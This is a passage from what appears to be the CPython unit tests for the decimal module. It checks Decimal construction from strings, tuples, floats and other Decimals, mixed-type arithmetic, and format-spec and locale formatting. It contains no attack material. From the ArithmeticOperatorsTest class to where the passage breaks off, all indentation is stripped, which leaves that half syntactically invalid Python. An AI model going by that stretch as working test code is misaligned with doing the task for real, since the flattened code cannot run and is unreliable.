        #leading and trailing whitespace permitted
        self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
        self.assertEqual(str(Decimal(' -7.89')), '-7.89')
        self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')

        # underscores
        self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
        self.assertEqual(str(Decimal('1_0_0_0')), '1000')

        # unicode whitespace
        for lead in ["", ' ', '\u00a0', '\u205f']:
            for trail in ["", ' ', '\u00a0', '\u205f']:
                self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
                                 '9.311E+28')

        with localcontext() as c:
            c.traps[InvalidOperation] = True
            # Invalid string
            self.assertRaises(InvalidOperation, Decimal, "xyz")
            # Two arguments max
            self.assertRaises(TypeError, Decimal, "1234", "x", "y")

            # space within the numeric part
            self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
            self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")

            # unicode whitespace
            self.assertRaises(InvalidOperation, Decimal, "\u00a0")
            self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")

            # embedded NUL
            self.assertRaises(InvalidOperation, Decimal, "12\u00003")

            # underscores don't prevent errors
            self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")

    @cpython_only
    def test_from_legacy_strings(self):
        # Legacy (non-compact) unicode strings must still parse correctly.
        import _testcapi
        Decimal = self.decimal.Decimal
        context = self.decimal.Context()

        s = _testcapi.unicode_legacy_string('9.999999')
        self.assertEqual(str(Decimal(s)), '9.999999')
        self.assertEqual(str(context.create_decimal(s)), '9.999999')

    def test_explicit_from_tuples(self):
        Decimal = self.decimal.Decimal

        #zero
        d = Decimal( (0, (0,), 0) )
        self.assertEqual(str(d), '0')

        #int
        d = Decimal( (1, (4, 5), 0) )
        self.assertEqual(str(d), '-45')

        #float
        d = Decimal( (0, (4, 5, 3, 4), -2) )
        self.assertEqual(str(d), '45.34')

        #weird
        d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
        self.assertEqual(str(d), '-4.34913534E-17')

        #inf
        d = Decimal( (0, (), "F") )
        self.assertEqual(str(d), 'Infinity')

        #wrong number of items
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )

        #bad sign
        self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
        self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
        self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))

        #bad exp
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )

        #bad coefficients
        self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
        self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
        self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
        self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )

    def test_explicit_from_list(self):
        # Lists (and mixed list/tuple nesting) are accepted like tuples.
        Decimal = self.decimal.Decimal

        d = Decimal([0, [0], 0])
        self.assertEqual(str(d), '0')

        d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
        self.assertEqual(str(d), '-4.34913534E-17')

        d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
        self.assertEqual(str(d), '-4.34913534E-17')

        d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
        self.assertEqual(str(d), '-4.34913534E-17')

    def test_explicit_from_bool(self):
        Decimal = self.decimal.Decimal

        self.assertIs(bool(Decimal(0)), False)
        self.assertIs(bool(Decimal(1)), True)
        self.assertEqual(Decimal(False), Decimal(0))
        self.assertEqual(Decimal(True), Decimal(1))

    def test_explicit_from_Decimal(self):
        Decimal = self.decimal.Decimal

        #positive
        d = Decimal(45)
        e = Decimal(d)
        self.assertEqual(str(e), '45')

        #very large positive
        d = Decimal(500000123)
        e = Decimal(d)
        self.assertEqual(str(e), '500000123')

        #negative
        d = Decimal(-45)
        e = Decimal(d)
        self.assertEqual(str(e), '-45')

        #zero
        d = Decimal(0)
        e = Decimal(d)
        self.assertEqual(str(e), '0')

    @requires_IEEE_754
    def test_explicit_from_float(self):
        Decimal = self.decimal.Decimal

        r = Decimal(0.1)
        self.assertEqual(type(r), Decimal)
        self.assertEqual(str(r),
                '0.1000000000000000055511151231257827021181583404541015625')
        self.assertTrue(Decimal(float('nan')).is_qnan())
        self.assertTrue(Decimal(float('inf')).is_infinite())
        self.assertTrue(Decimal(float('-inf')).is_infinite())
        self.assertEqual(str(Decimal(float('nan'))),
                         str(Decimal('NaN')))
        self.assertEqual(str(Decimal(float('inf'))),
                         str(Decimal('Infinity')))
        self.assertEqual(str(Decimal(float('-inf'))),
                         str(Decimal('-Infinity')))
        self.assertEqual(str(Decimal(float('-0.0'))),
                         str(Decimal('-0')))
        # Random floats must survive the float -> Decimal -> float roundtrip.
        for i in range(200):
            x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
            self.assertEqual(x, float(Decimal(x))) # roundtrip

    def test_explicit_context_create_decimal(self):
        Decimal = self.decimal.Decimal
        InvalidOperation = self.decimal.InvalidOperation
        Rounded = self.decimal.Rounded

        nc = copy.copy(self.decimal.getcontext())
        nc.prec = 3

        # empty
        d = Decimal()
        self.assertEqual(str(d), '0')
        d = nc.create_decimal()
        self.assertEqual(str(d), '0')

        # from None
        self.assertRaises(TypeError, nc.create_decimal, None)

        # from int
        d = nc.create_decimal(456)
        self.assertIsInstance(d, Decimal)
        self.assertEqual(nc.create_decimal(45678),
                         nc.create_decimal('457E+2'))

        # from string
        d = Decimal('456789')
        self.assertEqual(str(d), '456789')
        d = nc.create_decimal('456789')
        self.assertEqual(str(d), '4.57E+5')
        # leading and trailing whitespace should result in a NaN;
        # spaces are already checked in Cowlishaw's test-suite, so
        # here we just check that a trailing newline results in a NaN
        self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')

        # from tuples
        d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
        self.assertEqual(str(d), '-4.34913534E-17')
        d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
        self.assertEqual(str(d), '-4.35E-17')

        # from Decimal
        prevdec = Decimal(500000123)
        d = Decimal(prevdec)
        self.assertEqual(str(d), '500000123')
        d = nc.create_decimal(prevdec)
        self.assertEqual(str(d), '5.00E+8')

        # more integers
        nc.prec = 28
        nc.traps[InvalidOperation] = True

        for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
                  2**31-1, 2**31, 2**63-1, 2**63]:
            d = nc.create_decimal(v)
            self.assertTrue(isinstance(d, Decimal))
            self.assertEqual(int(d), v)

        nc.prec = 3
        nc.traps[Rounded] = True
        self.assertRaises(Rounded, nc.create_decimal, 1234)

        # from string
        nc.prec = 28
        self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
        self.assertEqual(str(nc.create_decimal('45')), '45')
        self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
        self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')

        # invalid arguments
        self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
        self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
        self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")

        # no whitespace and underscore stripping is done with this method
        self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
        self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")

        # too many NaN payload digits
        nc.prec = 3
        self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
        self.assertRaises(InvalidOperation, nc.create_decimal,
                          Decimal('NaN12345'))

        nc.traps[InvalidOperation] = False
        self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
        self.assertTrue(nc.flags[InvalidOperation])

        nc.flags[InvalidOperation] = False
        self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
        self.assertTrue(nc.flags[InvalidOperation])

    def test_explicit_context_create_from_float(self):
        Decimal = self.decimal.Decimal

        nc = self.decimal.Context()
        r = nc.create_decimal(0.1)
        self.assertEqual(type(r), Decimal)
        self.assertEqual(str(r), '0.1000000000000000055511151231')
        self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
        self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
        self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
        self.assertEqual(str(nc.create_decimal(float('nan'))),
                         str(nc.create_decimal('NaN')))
        self.assertEqual(str(nc.create_decimal(float('inf'))),
                         str(nc.create_decimal('Infinity')))
        self.assertEqual(str(nc.create_decimal(float('-inf'))),
                         str(nc.create_decimal('-Infinity')))
        self.assertEqual(str(nc.create_decimal(float('-0.0'))),
                         str(nc.create_decimal('-0')))
        nc.prec = 100
        # Random floats must roundtrip at high precision.
        for i in range(200):
            x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
            self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip

    def test_unicode_digits(self):
        # Non-ASCII decimal digits are accepted in the numeric parser.
        Decimal = self.decimal.Decimal

        test_values = {
            '\uff11': '1',
            '\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
            '-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
            }
        for input, expected in test_values.items():
            self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
    # Explicit-construction tests against the C accelerator (_decimal).
    decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
    # Explicit-construction tests against the pure-Python implementation.
    decimal = P
class ImplicitConstructionTest(unittest.TestCase):
    '''Unit tests for Implicit Construction cases of Decimal.

    "Implicit construction" means mixing Decimal with other operand
    types in arithmetic expressions.  Subclasses select the
    implementation via the ``decimal`` attribute.
    '''

    def test_implicit_from_None(self):
        Decimal = self.decimal.Decimal
        self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())

    def test_implicit_from_int(self):
        Decimal = self.decimal.Decimal

        #normal
        self.assertEqual(str(Decimal(5) + 45), '50')
        #exceeding precision
        self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))

    def test_implicit_from_string(self):
        Decimal = self.decimal.Decimal
        self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())

    def test_implicit_from_float(self):
        Decimal = self.decimal.Decimal
        self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())

    def test_implicit_from_Decimal(self):
        Decimal = self.decimal.Decimal
        self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))

    def test_rop(self):
        Decimal = self.decimal.Decimal

        # Allow other classes to be trained to interact with Decimals
        class E:
            def __divmod__(self, other):
                return 'divmod ' + str(other)
            def __rdivmod__(self, other):
                return str(other) + ' rdivmod'
            def __lt__(self, other):
                return 'lt ' + str(other)
            def __gt__(self, other):
                return 'gt ' + str(other)
            def __le__(self, other):
                return 'le ' + str(other)
            def __ge__(self, other):
                return 'ge ' + str(other)
            def __eq__(self, other):
                return 'eq ' + str(other)
            def __ne__(self, other):
                return 'ne ' + str(other)
        self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
        self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
        # Decimal must defer to E's reflected comparison methods.
        self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
        self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
        self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
        self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
        self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
        self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')

        # insert operator methods and then exercise them
        oplist = [
            ('+', '__add__', '__radd__'),
            ('-', '__sub__', '__rsub__'),
            ('*', '__mul__', '__rmul__'),
            ('/', '__truediv__', '__rtruediv__'),
            ('%', '__mod__', '__rmod__'),
            ('//', '__floordiv__', '__rfloordiv__'),
            ('**', '__pow__', '__rpow__')
        ]

        for sym, lop, rop in oplist:
            setattr(E, lop, lambda self, other: 'str' + lop + str(other))
            setattr(E, rop, lambda self, other: str(other) + rop + 'str')
            self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
                             'str' + lop + '10')
            self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
                             '10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
    # Implicit-construction tests against the C accelerator (_decimal).
    decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
    # Implicit-construction tests against the pure-Python implementation.
    decimal = P
class FormatTest(unittest.TestCase):
    '''Unit tests for the format function.

    Subclasses select the implementation via the ``decimal`` attribute.
    '''

    def test_formatting(self):
        Decimal = self.decimal.Decimal

        # triples giving a format, a Decimal, and the expected result
        test_values = [
            ('e', '0E-15', '0e-15'),
            ('e', '2.3E-15', '2.3e-15'),
            ('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
            ('e', '2.30000E-15', '2.30000e-15'),
            ('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
            ('e', '1.5', '1.5e+0'),
            ('e', '0.15', '1.5e-1'),
            ('e', '0.015', '1.5e-2'),
            ('e', '0.0000000000015', '1.5e-12'),
            ('e', '15.0', '1.50e+1'),
            ('e', '-15', '-1.5e+1'),
            ('e', '0', '0e+0'),
            ('e', '0E1', '0e+1'),
            ('e', '0.0', '0e-1'),
            ('e', '0.00', '0e-2'),
            ('.6e', '0E-15', '0.000000e-9'),
            ('.6e', '0', '0.000000e+6'),
            ('.6e', '9.999999', '9.999999e+0'),
            ('.6e', '9.9999999', '1.000000e+1'),
            ('.6e', '-1.23e5', '-1.230000e+5'),
            ('.6e', '1.23456789e-3', '1.234568e-3'),
            ('f', '0', '0'),
            ('f', '0.0', '0.0'),
            ('f', '0E-2', '0.00'),
            ('f', '0.00E-8', '0.0000000000'),
            ('f', '0E1', '0'), # loses exponent information
            ('f', '3.2E1', '32'),
            ('f', '3.2E2', '320'),
            ('f', '3.20E2', '320'),
            ('f', '3.200E2', '320.0'),
            ('f', '3.2E-6', '0.0000032'),
            ('.6f', '0E-15', '0.000000'), # all zeros treated equally
            ('.6f', '0E1', '0.000000'),
            ('.6f', '0', '0.000000'),
            ('.0f', '0', '0'), # no decimal point
            ('.0f', '0e-2', '0'),
            ('.0f', '3.14159265', '3'),
            ('.1f', '3.14159265', '3.1'),
            ('.4f', '3.14159265', '3.1416'),
            ('.6f', '3.14159265', '3.141593'),
            ('.7f', '3.14159265', '3.1415926'), # round-half-even!
            ('.8f', '3.14159265', '3.14159265'),
            ('.9f', '3.14159265', '3.141592650'),

            ('g', '0', '0'),
            ('g', '0.0', '0.0'),
            ('g', '0E1', '0e+1'),
            ('G', '0E1', '0E+1'),
            ('g', '0E-5', '0.00000'),
            ('g', '0E-6', '0.000000'),
            ('g', '0E-7', '0e-7'),
            ('g', '-0E2', '-0e+2'),
            ('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
            ('.0n', '3.14159265', '3'), # same for 'n'
            ('.1g', '3.14159265', '3'),
            ('.2g', '3.14159265', '3.1'),
            ('.5g', '3.14159265', '3.1416'),
            ('.7g', '3.14159265', '3.141593'),
            ('.8g', '3.14159265', '3.1415926'), # round-half-even!
            ('.9g', '3.14159265', '3.14159265'),
            ('.10g', '3.14159265', '3.14159265'), # don't pad

            ('%', '0E1', '0%'),
            ('%', '0E0', '0%'),
            ('%', '0E-1', '0%'),
            ('%', '0E-2', '0%'),
            ('%', '0E-3', '0.0%'),
            ('%', '0E-4', '0.00%'),

            ('.3%', '0', '0.000%'), # all zeros treated equally
            ('.3%', '0E10', '0.000%'),
            ('.3%', '0E-10', '0.000%'),
            ('.3%', '2.34', '234.000%'),
            ('.3%', '1.234567', '123.457%'),
            ('.0%', '1.23', '123%'),

            ('e', 'NaN', 'NaN'),
            ('f', '-NaN123', '-NaN123'),
            ('+g', 'NaN456', '+NaN456'),
            ('.3e', 'Inf', 'Infinity'),
            ('.16f', '-Inf', '-Infinity'),
            ('.0g', '-sNaN', '-sNaN'),

            ('', '1.00', '1.00'),

            # test alignment and padding
            ('6', '123', '   123'),
            ('<6', '123', '123   '),
            ('>6', '123', '   123'),
            ('^6', '123', ' 123  '),
            ('=+6', '123', '+  123'),
            ('#<10', 'NaN', 'NaN#######'),
            ('#<10', '-4.3', '-4.3######'),
            ('#<+10', '0.0130', '+0.0130###'),
            ('#< 10', '0.0130', ' 0.0130###'),
            ('@>10', '-Inf', '@-Infinity'),
            ('#>5', '-Inf', '-Infinity'),
            ('?^5', '123', '?123?'),
            ('%^6', '123', '%123%%'),
            (' ^6', '-45.6', '-45.6 '),
            ('/=10', '-45.6', '-/////45.6'),
            ('/=+10', '45.6', '+/////45.6'),
            ('/= 10', '45.6', ' /////45.6'),
            ('\x00=10', '-inf', '-\x00Infinity'),
            ('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
            ('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
            ('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),

            # thousands separator
            (',', '1234567', '1,234,567'),
            (',', '123456', '123,456'),
            (',', '12345', '12,345'),
            (',', '1234', '1,234'),
            (',', '123', '123'),
            (',', '12', '12'),
            (',', '1', '1'),
            (',', '0', '0'),
            (',', '-1234567', '-1,234,567'),
            (',', '-123456', '-123,456'),
            ('7,', '123456', '123,456'),
            ('8,', '123456', ' 123,456'),
            ('08,', '123456', '0,123,456'), # special case: extra 0 needed
            ('+08,', '123456', '+123,456'), # but not if there's a sign
            (' 08,', '123456', ' 123,456'),
            ('08,', '-123456', '-123,456'),
            ('+09,', '123456', '+0,123,456'),
            # ... with fractional part...
            ('07,', '1234.56', '1,234.56'),
            ('08,', '1234.56', '1,234.56'),
            ('09,', '1234.56', '01,234.56'),
            ('010,', '1234.56', '001,234.56'),
            ('011,', '1234.56', '0,001,234.56'),
            ('012,', '1234.56', '0,001,234.56'),
            ('08,.1f', '1234.5', '01,234.5'),
            # no thousands separators in fraction part
            (',', '1.23456789', '1.23456789'),
            (',%', '123.456789', '12,345.6789%'),
            (',e', '123456', '1.23456e+5'),
            (',E', '123456', '1.23456E+5'),

            # issue 6850
            ('a=-7.0', '0.12345', 'aaaa0.1'),

            # issue 22090
            ('<^+15.20%', 'inf', '<<+Infinity%<<<'),
            ('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
            ('=10.10%', 'NaN123', '   NaN123%'),
            ]
        for fmt, d, result in test_values:
            self.assertEqual(format(Decimal(d), fmt), result)

        # bytes format argument
        self.assertRaises(TypeError, Decimal(1).__format__, b'-020')

    def test_n_format(self):
        Decimal = self.decimal.Decimal

        try:
            from locale import CHAR_MAX
        except ImportError:
            self.skipTest('locale.CHAR_MAX not available')

        def make_grouping(lst):
            # The C version takes grouping as a string of chr() codes,
            # the Python version as a plain list.
            return ''.join([chr(x) for x in lst]) if self.decimal == C else lst

        def get_fmt(x, override=None, fmt='n'):
            # The two implementations spell the localeconv override
            # argument differently.
            if self.decimal == C:
                return Decimal(x).__format__(fmt, override)
            else:
                return Decimal(x).__format__(fmt, _localeconv=override)

        # Set up some localeconv-like dictionaries
        en_US = {
            'decimal_point' : '.',
            'grouping' : make_grouping([3, 3, 0]),
            'thousands_sep' : ','
            }

        fr_FR = {
            'decimal_point' : ',',
            'grouping' : make_grouping([CHAR_MAX]),
            'thousands_sep' : ''
            }

        ru_RU = {
            'decimal_point' : ',',
            'grouping': make_grouping([3, 3, 0]),
            'thousands_sep' : ' '
            }

        crazy = {
            'decimal_point' : '&',
            'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
            'thousands_sep' : '-'
            }

        dotsep_wide = {
            'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
            'grouping': make_grouping([3, 3, 0]),
            'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
            }

        self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
        self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
        self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
        self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')

        self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
        self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
        self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
        self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')

        self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
        self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
        self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
        self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')

        # zero padding
        self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
        self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
        self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
        self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')

        self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
        self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
        self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
        self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
        self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
        self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')

        self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')

        # wide char separator and decimal point
        self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
                         '-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')

    @run_with_locale('LC_ALL', 'ps_AF')
    def test_wide_char_separator_decimal_point(self):
        # locale with wide char separator and decimal point
        Decimal = self.decimal.Decimal

        decimal_point = locale.localeconv()['decimal_point']
        thousands_sep = locale.localeconv()['thousands_sep']
        if decimal_point != '\u066b':
            self.skipTest('inappropriate decimal point separator '
                          '({!a} not {!a})'.format(decimal_point, '\u066b'))
        if thousands_sep != '\u066c':
            self.skipTest('inappropriate thousands separator '
                          '({!a} not {!a})'.format(thousands_sep, '\u066c'))

        self.assertEqual(format(Decimal('100000000.123'), 'n'),
                         '100\u066c000\u066c000\u066b123')

    def test_decimal_from_float_argument_type(self):
        # from_float() must hand the subclass constructor a plain Decimal.
        class A(self.decimal.Decimal):
            def __init__(self, a):
                self.a_type = type(a)
        a = A.from_float(42.5)
        self.assertEqual(self.decimal.Decimal, a.a_type)

        a = A.from_float(42)
        self.assertEqual(self.decimal.Decimal, a.a_type)
class CFormatTest(FormatTest):
    # Formatting tests against the C accelerator (_decimal).
    decimal = C
class PyFormatTest(FormatTest):
    # Formatting tests against the pure-Python implementation.
    decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
